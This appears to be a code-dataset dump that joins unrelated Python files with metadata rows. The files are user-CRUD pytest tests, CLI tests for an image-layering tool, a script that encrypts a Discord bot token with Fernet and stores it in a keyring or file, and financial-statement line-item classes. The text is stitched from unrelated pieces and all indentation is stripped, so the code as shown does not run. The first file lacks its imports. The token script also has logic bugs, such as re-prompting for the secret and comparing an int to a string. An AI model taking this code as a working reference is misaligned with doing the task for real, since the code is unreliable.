from sqlalchemy.orm import Session
from app import crud, schemas
from app.core import security
def test_create_user(db: Session) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
assert user.email == email
assert user.username == username
assert hasattr(user, "hashed_password")
assert security.verify_password(SecretStr(password), user.hashed_password)
def test_authenticate_user_success(db: Session) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
wrong_email = email + "xxx"
authenticated_user = crud.user.authenticate(
db, email=wrong_email, password=SecretStr(password)
)
assert not authenticated_user
wrong_password = password + "xxx"
authenticated_user = crud.user.authenticate(
db, email=email, password=SecretStr(wrong_password)
)
assert not authenticated_user
authenticated_user = crud.user.authenticate(
db, email=email, password=SecretStr(password)
)
assert authenticated_user
assert user.email == authenticated_user.email
@pytest.mark.parametrize("search_by", ("email", "username", "id"))
def test_get_user_by(db: Session, search_by: str) -> None:
faker = Faker()
profile = faker.profile()
email = profile.get("mail", None)
username = profile.get("username", None)
password = "changeit"
user_in = schemas.UserCreate(
username=username, email=email, password=SecretStr(password)
)
user = crud.user.create(db=db, obj_in=user_in)
func_name = f"get_user_by_{search_by}"
func = getattr(crud.user, func_name)
user_2 = func(db, getattr(user, search_by))
assert user_2
assert user.email == user_2.email
assert jsonable_encoder(user) == jsonable_encoder(user_2)
| 31.298701
| 78
| 0.702075
| 0
| 0
| 0
| 0
| 695
| 0.288382
| 0
| 0
| 163
| 0.067635
|
36a9b87e26910ffc305f742982f6fa1a3f99417f
| 5,673
|
py
|
Python
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 5
|
2021-01-03T11:38:40.000Z
|
2021-08-31T19:33:02.000Z
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 41
|
2020-12-01T06:59:24.000Z
|
2022-03-31T13:23:23.000Z
|
tests/cli_test.py
|
de-code/layered-vision
|
5cb34ed2fb787fb1e3a8dd7ee7f4f932fe81c038
|
[
"MIT"
] | 2
|
2021-02-02T07:48:34.000Z
|
2021-05-29T21:19:34.000Z
|
from pathlib import Path
from typing import Union
import cv2
import pytest
from layered_vision.cli import (
parse_value_expression,
parse_set_value,
get_merged_set_values,
main
)
EXAMPLE_IMAGE_URL = (
r'https://raw.githubusercontent.com/numpy/numpy'
r'/v1.20.1/branding/logo/logomark/numpylogoicon.png'
)
def _quote_path(path: Union[str, Path]) -> str:
return repr(str(path))
def _load_image(path: Union[str, Path]):
image = cv2.imread(str(path))
if image is None:
raise FileNotFoundError('failed to load image: %r' % path)
return image
class TestParseValueExpression:
def test_should_parse_str(self):
assert parse_value_expression('abc') == 'abc'
def test_should_parse_int(self):
assert parse_value_expression('30') == 30
def test_should_parse_float(self):
assert parse_value_expression('30.1') == 30.1
def test_should_parse_false(self):
assert parse_value_expression('false') is False
def test_should_parse_true(self):
assert parse_value_expression('true') is True
class TestParseSetValue:
def test_should_parse_simple_expression(self):
assert parse_set_value('in.input_path=/path/to/input') == {
'in': {
'input_path': '/path/to/input'
}
}
def test_should_parse_int_value(self):
assert parse_set_value('in.fps=30') == {
'in': {
'fps': 30
}
}
def test_should_fail_with_missing_value(self):
with pytest.raises(ValueError):
assert parse_set_value('in.input_path')
def test_should_fail_with_missing_layer_id(self):
with pytest.raises(ValueError):
assert parse_set_value('input_path=/path/to/input')
class TestGetMergedSetValues:
def test_should_merge_properties_with_same_layer_id(self):
assert get_merged_set_values([
{'id1': {'prop1': 'value1'}},
{'id1': {'prop2': 'value2'}}
]) == {
'id1': {
'prop1': 'value1',
'prop2': 'value2'
}
}
def test_should_merge_properties_with_different_layer_id(self):
assert get_merged_set_values([
{'id1': {'prop1': 'value1'}},
{'id2': {'prop2': 'value2'}}
]) == {
'id1': {'prop1': 'value1'},
'id2': {'prop2': 'value2'}
}
class TestMain:
def test_should_copy_source_to_target_image(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
- id: out
output_path: {output_path}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path=_quote_path(output_path)
)
)
main(['start', '--config-file=%s' % config_file])
image = _load_image(output_path)
height, width, *_ = image.shape
assert width > 0
assert height > 0
def test_should_copy_and_resize_source_to_target_image(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
width: 320
height: 200
- id: out
output_path: {output_path}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path=_quote_path(output_path)
)
)
main(['start', '--config-file=%s' % config_file])
image = _load_image(output_path)
height, width, *_ = image.shape
assert (width, height) == (320, 200)
def test_should_copy_to_multiple_outputs(self, temp_dir: Path):
output_path_1 = temp_dir / 'output_1.png'
output_path_2 = temp_dir / 'output_2.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: {input_path}
width: 320
height: 200
- id: out_1
output_path: {output_path_1}
- id: out_2
output_path: {output_path_2}
'''.format(
input_path=_quote_path(EXAMPLE_IMAGE_URL),
output_path_1=_quote_path(output_path_1),
output_path_2=_quote_path(output_path_2)
)
)
main(['start', '--config-file=%s' % config_file])
for output_path in [output_path_1, output_path_2]:
image = _load_image(output_path)
height, width, *_ = image.shape
assert (width, height) == (320, 200)
def test_should_be_able_to_replace_input_and_output_path(self, temp_dir: Path):
output_path = temp_dir / 'output.png'
config_file = temp_dir / 'config.yml'
config_file.write_text(
'''
layers:
- id: in
input_path: "dummy"
- id: out
output_path: "dummy"
'''
)
main([
'start',
'--config-file=%s' % config_file,
'--set',
'in.input_path=%s' % EXAMPLE_IMAGE_URL,
'--set',
'out.output_path=%s' % output_path
])
image = _load_image(output_path)
height, width, *_ = image.shape
assert width > 0
assert height > 0
| 29.701571
| 83
| 0.559845
| 5,067
| 0.893178
| 0
| 0
| 0
| 0
| 0
| 0
| 1,512
| 0.266526
|
36aa46d45cf3ea3334546c1c84c23f98e38d06f3
| 5,958
|
py
|
Python
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | 1
|
2020-06-22T01:15:49.000Z
|
2020-06-22T01:15:49.000Z
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | 2
|
2020-09-24T20:34:37.000Z
|
2021-06-25T15:38:45.000Z
|
src/discordbot/writeToken.py
|
mavjav-edu/discordpy
|
c3da0903bd7772d089536f935a381b301efb8fd5
|
[
"MIT"
] | null | null | null |
import os
import re
import base64
import keyring
from cryptography.fernet import Fernet
# Make sure the key, Fernet objects within scope of future dependencies
# by setting to here (to nothing, for now)
frn = Fernet(base64.b64encode(bytes(list(range(32)))))
key = bytes(0)
if os.path.isfile('./key'): # Check the 'key' file already exists
# attempts to open a 'key' file where we store the Fernet key
# (`rb` means `Read Binary` from file)
keyf = open("key", 'rb')
key = keyf.read()
keyf.close() # close the key file
else:
# This is for when the 'key' file doesn't exist or was deleted
print("Key did not exist. Creating...")
# attempts to create/open a 'key' file where we store the
# Fernet key (wb+ means Write Binary to file with additional
# read privileges)
keyf = open("key", 'wb+')
# generates a Fernet key and saves that key to the 'key' file
key = Fernet.generate_key()
keyf.write(key)
keyf.close() # close the key file
# create Fernet object to do encryption using our key from above
frn = Fernet(key)
print("[1] Store bot token in key ring", "[2] Store bot token to disk")
question = "Should we keep token in keyring or store to disk? [1-2]>\n"
howToStoreToken = int(input(question))
correctToken = False
while not(howToStoreToken == 1 or howToStoreToken == 2):
howToStoreToken = int(input(question)) # Keep asking for a 1 or 2
# basic regex pattern checks on presumed token
correctToken = False
while not(correctToken):
token = input("What's the bot token? > ")
clientSecretPat = re.compile("^.{32}$")
clientIDPat = re.compile("^\d{18}$")
tokenPat = re.compile("^.{59}$")
wrong = "The string you've entered looks like the %s.\
Are you sure you copied the correct field?"
if tokenPat.match(token):
print("Token pattern matches! 👍🏽")
correctToken = True
continue
elif clientSecretPat.match(token):
print(wrong % "client secret")
continue
elif clientIDPat.match(token):
print(wrong % "client ID")
continue
if howToStoreToken == 1:
# ask the user for the Discord token, then writes the token as password
# into the keyring with the Fernet key as the username
keyring.set_password("system", key, (
input("What is the secret?> ")))
if not keyring.get_password("system", key.decode('utf-8')) is None:
print("Your token has been stored in the file system keyring!")
else:
print("Could not store token in the file system keyring!")
elif howToStoreToken == 2:
tokenFilename = input("What should be the token filename?> ")
while(os.path.isfile('./' + tokenFilename)):
print(tokenFilename, "already exists.\nChoose another name.")
tokenFilename = input("What should be the token filename?> ")
try:
# try-finally block for error `IOError` on opening token file for
# writing binary
# attempt to create/open a 'tokenFilename' file where we store the
# encrypted Discord token (we don't need to read 'tokenFilename'
# here, so we only need write privileges)
tokenf = open(tokenFilename, 'wb')
# ask the user for the Discord token, then encodes as binary, then
# encrypts the binary, and then writes binary to 'token' file
tokenf.write(frn.encrypt(str.encode(token)))
except PermissionError as error:
print(error, "\nCould not write token file. Check permissions.")
finally:
tokenf.close() # close the file `token`
if(os.path.isfile('./' + tokenFilename)):
print("Your token has been stored in a file!")
# read and write `.gitignore` to make sure we don't accidentally upload
# key or token
try:
# open `.gitignore` as a read only
gitignoref = open(".gitignore", 'r')
# store the content of `.gitignore`
gitignore = gitignoref.read()
# open `.gitignore` append mode (write starting at the end of the file)
gitignoref = open(".gitignore", 'a')
# regular expression pattern matching the word 'key' anywhere
keyRE = re.compile("key", re.MULTILINE)
# if the word 'key' is not found in the content of `.gitignore`
if(re.search(keyRE, gitignore) is None):
# then add 'key' to the next line in `.gitignore`
gitignoref.write("\nkey")
# if the word 'token' is not found in the content of `.gitignore`
if(howToStoreToken == "2"):
# regular expression pattern matching the word 'token' anywhere
tokenRE = re.compile(tokenFilename, re.MULTILINE)
if(re.search(tokenRE, gitignore) is None):
# then add 'key' to the next line in `.gitignore`
gitignoref.write("\n" + tokenFilename)
except PermissionError as error:
print(error, "\nCould not write gitignore file. Check permissions.")
finally:
# Below code will run in any event (whether there is an error or not)
gitignoref.close() # close the file `.gitignore`
# Change the mod-logs channel in `discordbot.py`
question = "What is your `mod-logs` channel ID?"
modlogsID = input(question)
channelIDRe = '\d{18}'
channelIDPat = re.compile("^" + channelIDRe + "$")
while not(channelIDPat.match(modlogsID)):
print("Input ID incorrect. See https://bit.ly/31q1Qlh for instructions.")
modlogsID = input(question)
if os.path.isfile("discordbot.py"):
discordbotf = open("discordbot.py", 'r')
discordbot = discordbotf.readlines()
discordbotf.close()
modlogsReComp = re.compile("(\s+modlogs = )(" + channelIDRe + ")(.*)")
for lineNum in range(len(discordbot)):
print(lineNum)
if re.search(modlogsReComp, discordbot[lineNum]):
discordbot[lineNum] = re.sub(
modlogsReComp, r"\1 012345678901234567 \3", discordbot[lineNum]
)
break
discordbotf = open("discordbot.py", 'w')
discordbotf.writelines(discordbot)
discordbotf.close()
| 36.777778
| 79
| 0.659785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,015
| 0.505533
|
36abaa99b236edf5ae7e28366041af627d5c697a
| 38,462
|
py
|
Python
|
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T04:35:25.000Z
|
2019-07-29T04:35:25.000Z
|
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | null | null | null |
Deprecated/three_stmts.py
|
FrankVolpe/SIMFIN
|
63631d8cc7a7f19570b21aa1f7c49995fa0765d7
|
[
"BSD-3-Clause"
] | 1
|
2020-12-23T23:26:17.000Z
|
2020-12-23T23:26:17.000Z
|
from base_classes import *
class income_statement(financial_statement):
''' __init__ will create the necessary accounts for an income statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
####################################
## Final Line Of Income Statement ##
####################################
self.is_tid_58 = line_item('Net Income Available to Common Shareholders', 57)
####################################
## Net Income & Final Adjustments ##
####################################
self.is_tid_55 = line_item('Net Income',
54,
parent=self.is_tid_58)
self.is_tid_56 = line_item('Preferred Dividends',
55,
parent=self.is_tid_58)
self.is_tid_57 = line_item('Other Adjustments',
56,
parent=self.is_tid_58)
####################################
## Factoring In Minority Interest ##
####################################
self.is_tid_53 = line_item('Income (Loss) Including Minority Interest',
52,
parent=self.is_tid_55)
self.is_tid_54 = line_item('Minority Interest',
53,
parent=self.is_tid_55)
#########################
## Extraordinary Items ##
#########################
self.is_tid_50 = line_item('Net Extraordinary Gains (Losses)',
49,
parent=self.is_tid_53)
self.is_tid_51 = line_item(' Discontinued Operations',
50,
parent=self.is_tid_50)
self.is_tid_52 = line_item(' XO & Accounting Charges & Other',
51,
parent=self.is_tid_50)
########################
## Income After Taxes ##
########################
self.is_tid_49 = line_item('Income (Loss) from Continuing Operations',
48,
parent=self.is_tid_53)
self.is_tid_48 = line_item('Income (Loss) from Affiliates, net of taxes',
47,
parent=self.is_tid_49)
####################
## Pre-Tax Income ##
####################
self.is_tid_43 = line_item('Pretax Income (Loss)',
42,
parent=self.is_tid_49)
self.is_tid_28 = line_item('Pretax Income (Loss), Adjusted',
27,
parent=self.is_tid_43)
#################
## Tax Expense ##
#################
self.is_tid_44 = line_item('Income Tax (Expense) Benefit, net',
43,
parent=self.is_tid_49)
self.is_tid_45 = line_item(' Current Income Tax',
44,
parent=self.is_tid_44)
self.is_tid_46 = line_item(' Deferred Income Tax',
45,
parent=self.is_tid_44)
self.is_tid_47 = line_item(' Tax Allowance/Credit',
46,
parent=self.is_tid_44)
####################################
## Abnormal Activities & Children ##
####################################
self.is_tid_29 = line_item('Abnormal Gains (Losses)',
28,
parent=self.is_tid_43)
self.is_tid_30 = line_item(' Acquired In-Process R&D',
29,
parent=self.is_tid_29)
self.is_tid_31 = line_item(' Merger / Acquisition Expense',
30,
parent=self.is_tid_29)
self.is_tid_32 = line_item(' Abnormal Derivatives',
31,
parent=self.is_tid_29)
self.is_tid_33 = line_item(' Disposal of Assets',
32,
parent=self.is_tid_29)
self.is_tid_34 = line_item(' Early extinguishment of Debt',
33,
parent=self.is_tid_29)
self.is_tid_35 = line_item(' Asset Write-Down',
34,
parent=self.is_tid_29)
self.is_tid_36 = line_item(' Impairment of Goodwill & Intangibles',
35,
parent=self.is_tid_29)
self.is_tid_37 = line_item(' Sale of Business',
36,
parent=self.is_tid_29)
self.is_tid_38 = line_item(' Legal Settlement',
37,
parent=self.is_tid_29)
self.is_tid_39 = line_item(' Restructuring Charges',
38,
parent=self.is_tid_29)
self.is_tid_40 = line_item(' Sale of and Unrealized Investments',
39,
parent=self.is_tid_29)
self.is_tid_41 = line_item(' Insurance Settlement',
40,
parent=self.is_tid_29)
self.is_tid_42 = line_item(' Other Abnormal Items',
41,
parent=self.is_tid_29)
##############################
## Non-Operating Activities ##
##############################
self.is_tid_20 = line_item('Non-Operating Income (Loss)',
19,
parent=self.is_tid_28)
self.is_tid_21 = line_item(' Interest Expense, net',
20,
parent=self.is_tid_20)
self.is_tid_22 = line_item(' Interest Expense',
21,
parent=self.is_tid_21)
self.is_tid_23 = line_item(' Interest Income',
22,
parent=self.is_tid_21)
self.is_tid_24 = line_item(' Other Investment Income (Loss)',
23,
parent=self.is_tid_20)
self.is_tid_25 = line_item(' Foreign Exchange Gain (Loss)',
24,
parent=self.is_tid_20)
self.is_tid_26 = line_item(' Income (Loss) from Affiliates',
25,
parent=self.is_tid_20)
self.is_tid_27 = line_item(' Other Non-Operating Income (Loss)',
26,
parent=self.is_tid_20)
######################
## Operating Income ##
######################
self.is_tid_19 = line_item('Operating Income (Loss)',
18,
parent=self.is_tid_28)
self.is_tid_10 = line_item(' Other Operating Income',
9,
parent=self.is_tid_19)
###################################
## Operating Expenses & Children ##
###################################
self.is_tid_11 = line_item('Operating Expenses',
10,
parent=self.is_tid_19)
self.is_tid_12 = line_item(' Selling, General & Administrative',
11,
parent=self.is_tid_11)
self.is_tid_13 = line_item(' Selling & Marketing',
12,
parent=self.is_tid_12)
self.is_tid_14 = line_item(' General & Administrative',
13,
parent=self.is_tid_12)
self.is_tid_15 = line_item(' Research & Development',
14,
parent=self.is_tid_11)
self.is_tid_16 = line_item(' Depreciation & Amortization',
15,
parent=self.is_tid_11)
self.is_tid_17 = line_item(' Provision For Doubtful Accounts',
16,
parent=self.is_tid_11)
self.is_tid_18 = line_item(' Other Operating Expense',
17,
parent=self.is_tid_11)
##################
## Gross Profit ##
##################
self.is_tid_4 = line_item('Gross Profit',
8,
parent=self.is_tid_19)
##############################
## Cost of Sales & Children ##
##############################
self.is_tid_2 = line_item('Cost of revenue',
4,
parent=self.is_tid_4)
self.is_tid_7 = line_item(' Cost of Goods & Services',
5,
parent=self.is_tid_2)
self.is_tid_8 = line_item(' Cost of Financing Revenue',
6,
parent=self.is_tid_2)
self.is_tid_9 = line_item(' Cost of Other Revenue',
7,
parent=self.is_tid_2)
########################
## Revenue & Children ##
########################
self.is_tid_1 = line_item('Revenue',
0,
parent=self.is_tid_4)
self.is_tid_3 = line_item(' Sales & Services Revenue',
1,
parent=self.is_tid_1)
self.is_tid_5 = line_item(' Financing Revenue',
2,
parent=self.is_tid_1)
self.is_tid_6 = line_item(' Other Revenue',
3,
parent=self.is_tid_1)
if data:
self.add_data(data)
class cash_flow_statement(financial_statement):
''' __init__ will create the necessary accounts for a cash flow statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
#######################################
## Final Line Of Cash Flow Statement ##
#######################################
self.cf_tid_46 = line_item('Net Changes in Cash', 51)
######################################
## Factoring In FX Gains and Losses ##
######################################
self.cf_tid_44 = line_item(' Effect of Foreign Exchange Rates',
50,
parent=self.cf_tid_46)
self.cf_tid_55 = line_item('Net Cash Before FX',
49,
parent=self.cf_tid_46)
##########################################
## Factoring in Discontinued Operations ##
##########################################
self.cf_tid_56 = line_item('Net Cash Before Disc. Operations and FX',
47,
parent=self.cf_tid_55)
self.cf_tid_45 = line_item(' Change in Cash from Disc. Operations and Other',
48,
parent=self.cf_tid_55)
####################################
## Cash From Operating Activities ##
####################################
self.cf_tid_13 = line_item('Cash from Operating Activities',
15,
parent=self.cf_tid_56)
###########################
## Net Income & Children ##
###########################
self.cf_tid_1 = line_item('Net Income/Starting Line',
0,
parent=self.cf_tid_13)
self.cf_tid_47 = line_item(' Net Income',
1,
parent=self.cf_tid_1)
self.cf_tid_48 = line_item(' Net Income From Discontinued Operations',
2,
parent=self.cf_tid_1)
self.cf_tid_49 = line_item(' Other Adjustments',
3,
parent=self.cf_tid_1)
###############################
## Non-Cash Items & Children ##
###############################
self.cf_tid_3 = line_item('Non-Cash Items',
5,
parent=self.cf_tid_13)
self.cf_tid_4 = line_item(' Stock-Based Compensation',
6,
parent=self.cf_tid_3)
self.cf_tid_5 = line_item(' Deferred Income Taxes',
7,
parent=self.cf_tid_3)
self.cf_tid_6 = line_item(' Other Non-Cash Adjustments',
8,
parent=self.cf_tid_3)
##########################################
## Change in Working Capital & Children ##
##########################################
self.cf_tid_7 = line_item('Change in Working Capital',
9,
parent=self.cf_tid_13)
self.cf_tid_8 = line_item(' (Increase) Decrease in Accounts Receivable',
10,
parent=self.cf_tid_7)
self.cf_tid_9 = line_item(' (Increase) Decrease in Inventories',
11,
parent=self.cf_tid_7)
self.cf_tid_10 = line_item(' Increase (Decrease) in Accounts Payable',
12,
parent=self.cf_tid_7)
self.cf_tid_11 = line_item(' Increase (Decrease) in Other',
13,
parent=self.cf_tid_7)
#########################################
## Cash From Operating Children, Other ##
#########################################
self.cf_tid_12 = line_item('Net Cash From Discontinued Operations (operating)',
14,
parent=self.cf_tid_13)
self.cf_tid_2 = line_item('Depreciation & Amortization',
4,
parent=self.cf_tid_13)
####################################
## Cash From Investing Activities ##
####################################
self.cf_tid_31 = line_item('Cash from Investing Activities',
34,
parent=self.cf_tid_56)
###################################################
## Fixed Asset/Intangibles Activity and Children ##
###################################################
self.cf_tid_14 = line_item('Change in Fixed Assets & Intangibles',
16,
parent=self.cf_tid_31)
#######################################
## Continued, Disposition Acitivites ##
#######################################
self.cf_tid_15 = line_item(' Disposition of Fixed Assets & Intangibles',
17,
parent=self.cf_tid_14)
self.cf_tid_16 = line_item(' Disposition of Fixed Assets',
18,
parent=self.cf_tid_15)
self.cf_tid_17 = line_item(' Disposition of Intangible Assets',
19,
parent=self.cf_tid_15)
#######################################
## Continued, Acquisition Acitivites ##
#######################################
self.cf_tid_18 = line_item(' Acquisition of Fixed Assets & Intangibles',
20,
parent=self.cf_tid_14)
self.cf_tid_19 = line_item(' Purchase of Fixed Assets',
21,
parent=self.cf_tid_18)
self.cf_tid_20 = line_item(' Acquisition of Intangible Assets',
22,
parent=self.cf_tid_18)
self.cf_tid_21 = line_item(' Other Change in Fixed Assets & Intangibles',
23,
parent=self.cf_tid_14)
#########################################
## LT Investment Activity and Children ##
#########################################
self.cf_tid_22 = line_item('Net Change in Long Term Investment',
24,
parent=self.cf_tid_31)
self.cf_tid_23 = line_item( 'Decrease in Long Term Investment',
25,
parent=self.cf_tid_22)
self.cf_tid_24 = line_item(' Increase in Long Term Investment',
26,
parent=self.cf_tid_22)
#################################
## M & A Activity and Children ##
#################################
self.cf_tid_25 = line_item('Net Cash From Acquisitions & Divestitures',
27,
parent=self.cf_tid_31)
self.cf_tid_26 = line_item(' Net Cash from Divestitures',
28,
parent=self.cf_tid_25)
self.cf_tid_27 = line_item(' Cash for Acqusition of Subsidiaries',
29,
parent=self.cf_tid_25)
self.cf_tid_28 = line_item(' Cash for Joint Ventures',
30,
parent=self.cf_tid_25)
self.cf_tid_50 = line_item(' Net Cash from Other Acquisitions',
31,
parent=self.cf_tid_25)
#########################################
## Cash From Investing Children, Other ##
#########################################
self.cf_tid_29 = line_item('Other Investing Activities',
32,
parent=self.cf_tid_31)
self.cf_tid_30 = line_item('Net Cash From Discontinued Operations (investing)',
33,
parent=self.cf_tid_31)
####################################
## Cash From Financing Activities ##
####################################
self.cf_tid_43 = line_item('Cash from Financing Activities',
46,
parent=self.cf_tid_56)
##########################################
## Debt Financing Activity and Children ##
##########################################
self.cf_tid_33 = line_item('Cash From (Repayment of) Debt',
36,
parent=self.cf_tid_43)
self.cf_tid_34 = line_item('Cash From (Repayment of) Short Term Debt, net',
37,
parent=self.cf_tid_33)
###################################
## Continued, LT Debt Acitivites ##
###################################
self.cf_tid_35 = line_item(' Cash From (Repayment of) Long Term Debt, net',
38,
parent=self.cf_tid_33)
self.cf_tid_36 = line_item(' Repayments of Long Term Debt',
39,
parent=self.cf_tid_35)
self.cf_tid_37 = line_item(' Cash From Long Term Debt',
40,
parent=self.cf_tid_35)
############################################
## Equity Financing Activity and Children ##
############################################
self.cf_tid_38 = line_item('Cash From (Repurchase of) Equity',
41,
parent=self.cf_tid_43)
self.cf_tid_39 = line_item(' Increase in Capital Stock',
42,
parent=self.cf_tid_38)
self.cf_tid_40 = line_item(' Decrease in Capital Stock',
43,
parent=self.cf_tid_38)
#########################################
## Cash From Financing Children, Other ##
#########################################
self.cf_tid_32 = line_item('Dividends Paid',
35,
parent=self.cf_tid_43)
self.cf_tid_41 = line_item('Other Financing Activities',
44,
parent=self.cf_tid_43)
self.cf_tid_42 = line_item('Net Cash From Discontinued Operations (financing)',
45,
parent=self.cf_tid_43)
if data:
self.add_data(data)
class balance_sheet(financial_statement):
''' __init__ will create the necessary accounts for a balance sheet.
----------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
################
## All Assets ##
################
self.bs_tid_41 = line_item('Total Assets', 40)
####################
## Current Assets ##
####################
self.bs_tid_21 = line_item('Total Current Assets',
20,
parent=self.bs_tid_41)
self.bs_tid_7 = line_item('Unbilled Revenues',
6,
parent=self.bs_tid_21)
##################################
## Cash, Equivalents & Children ##
##################################
self.bs_tid_1 = line_item('Cash, Cash Equivalents & Short Term Investments',
0,
parent=self.bs_tid_21)
self.bs_tid_2 = line_item(' Cash & Cash Equivalents',
1,
parent=self.bs_tid_1)
self.bs_tid_3 = line_item(' Short Term Investments',
2,
parent=self.bs_tid_1)
############################
## Receivables & Children ##
############################
self.bs_tid_4 = line_item('Accounts & Notes Receivable',
3,
parent=self.bs_tid_21)
self.bs_tid_5 = line_item(' Accounts Receivable, Net',
4,
parent=self.bs_tid_4)
self.bs_tid_6 = line_item(' Notes Receivable, Net',
5,
parent=self.bs_tid_4)
##########################
## Inventory & Children ##
##########################
self.bs_tid_8 = line_item('Inventories',
7,
parent=self.bs_tid_21)
self.bs_tid_9 = line_item(' Raw Materials',
8,
parent=self.bs_tid_8)
self.bs_tid_10 = line_item(' Work In Process',
9,
parent=self.bs_tid_8)
self.bs_tid_11 = line_item(' Finished Goods',
10,
parent=self.bs_tid_8)
self.bs_tid_12 = line_item(' Other Inventory',
11,
parent=self.bs_tid_8)
######################
## Other & Children ##
######################
self.bs_tid_13 = line_item('Other Short Term Assets',
12,
parent=self.bs_tid_21)
self.bs_tid_14 = line_item(' Prepaid Expenses',
13,
parent=self.bs_tid_13)
self.bs_tid_15 = line_item(' Derivative & Hedging Assets',
14,
parent=self.bs_tid_13)
self.bs_tid_16 = line_item(' Assets Held-for-Sale',
15,
parent=self.bs_tid_13)
self.bs_tid_17 = line_item(' Deferred Tax Assets',
16,
parent=self.bs_tid_13)
self.bs_tid_18 = line_item(' Income Taxes Receivable',
17,
parent=self.bs_tid_13)
self.bs_tid_19 = line_item(' Discontinued Operations',
18,
parent=self.bs_tid_13)
self.bs_tid_20 = line_item(' Miscellaneous Short Term Assets',
19,
parent=self.bs_tid_13)
########################
## Non-Current Assets ##
########################
self.bs_tid_40 = line_item('Total Noncurrent Assets',
39,
parent=self.bs_tid_41)
############
## PP & E ##
############
self.bs_tid_22 = line_item('Property, Plant & Equipment, Net',
21,
parent=self.bs_tid_40)
self.bs_tid_23 = line_item(' Property, Plant & Equipment',
22,
parent=self.bs_tid_22)
self.bs_tid_24 = line_item(' Accumulated Depreciation',
23,
parent=self.bs_tid_22)
###############################
## LT Investments & Children ##
###############################
self.bs_tid_25 = line_item('Long Term Investments & Receivables',
24,
parent=self.bs_tid_40)
self.bs_tid_26 = line_item(' Long Term Investments',
25,
parent=self.bs_tid_25)
self.bs_tid_27 = line_item(' Long Term Marketable Securities',
26,
parent=self.bs_tid_25)
self.bs_tid_28 = line_item(' Long Term Receivables',
27,
parent=self.bs_tid_25)
######################
## Other & Children ##
######################
self.bs_tid_29 = line_item('Other Long Term Assets',
28,
parent=self.bs_tid_40)
self.bs_tid_30 = line_item(' Intangible Assets',
29,
parent=self.bs_tid_29)
self.bs_tid_31 = line_item(' Goodwill',
30,
parent=self.bs_tid_29)
self.bs_tid_32 = line_item(' Other Intangible Assets',
31,
parent=self.bs_tid_29)
self.bs_tid_33 = line_item(' Prepaid Expense',
32,
parent=self.bs_tid_29)
self.bs_tid_34 = line_item(' Deferred Tax Assets',
33,
parent=self.bs_tid_29)
self.bs_tid_35 = line_item(' Derivative & Hedging Assets',
34,
parent=self.bs_tid_29)
self.bs_tid_36 = line_item(' Prepaid Pension Costs',
35,
parent=self.bs_tid_29)
self.bs_tid_37 = line_item(' Discontinued Operations',
36,
parent=self.bs_tid_29)
self.bs_tid_38 = line_item(' Investments in Affiliates',
37,
parent=self.bs_tid_29)
self.bs_tid_39 = line_item(' Miscellaneous Long Term Assets',
38,
parent=self.bs_tid_29)
################################
## All Liabilities and Equity ##
################################
self.bs_tid_85 = line_item('Total Liabilities & Equity', 84)
##################
## Liabilities ##
##################
self.bs_tid_73 = line_item('Total Liabilities',
72,
parent=self.bs_tid_85)
#########################
## Current Liabilities ##
#########################
self.bs_tid_57 = line_item('Total Current Liabilities',
56,
parent=self.bs_tid_73)
#########################
## Payables & Children ##
#########################
self.bs_tid_42 = line_item('Payables & Accruals',
41,
parent=self.bs_tid_57)
self.bs_tid_43 = line_item(' Accounts Payable',
42,
parent=self.bs_tid_42)
self.bs_tid_44 = line_item(' Accrued Taxes',
43,
parent=self.bs_tid_42)
self.bs_tid_45 = line_item(' Interest & Dividends Payable',
44,
parent=self.bs_tid_42)
self.bs_tid_46 = line_item(' Other Payables & Accruals',
45,
parent=self.bs_tid_42)
#####################
## Debt & Children ##
#####################
self.bs_tid_47 = line_item('Short Term Debt',
46,
parent=self.bs_tid_57)
self.bs_tid_48 = line_item(' Short Term Borrowings',
47,
parent=self.bs_tid_47)
self.bs_tid_49 = line_item(' Short Term Capital Leases',
48,
parent=self.bs_tid_47)
self.bs_tid_50 = line_item(' Current Portion of Long Term Debt',
49,
parent=self.bs_tid_47)
######################
## Other & Children ##
######################
self.bs_tid_51 = line_item('Other Short Term Liabilities',
50,
parent=self.bs_tid_57)
self.bs_tid_52 = line_item(' Deferred Revenue',
51,
parent=self.bs_tid_51)
self.bs_tid_53 = line_item(' Derivatives & Hedging',
52,
parent=self.bs_tid_51)
self.bs_tid_54 = line_item(' Deferred Tax Liabilities',
53,
parent=self.bs_tid_51)
self.bs_tid_55 = line_item(' Discontinued Operations',
54,
parent=self.bs_tid_51)
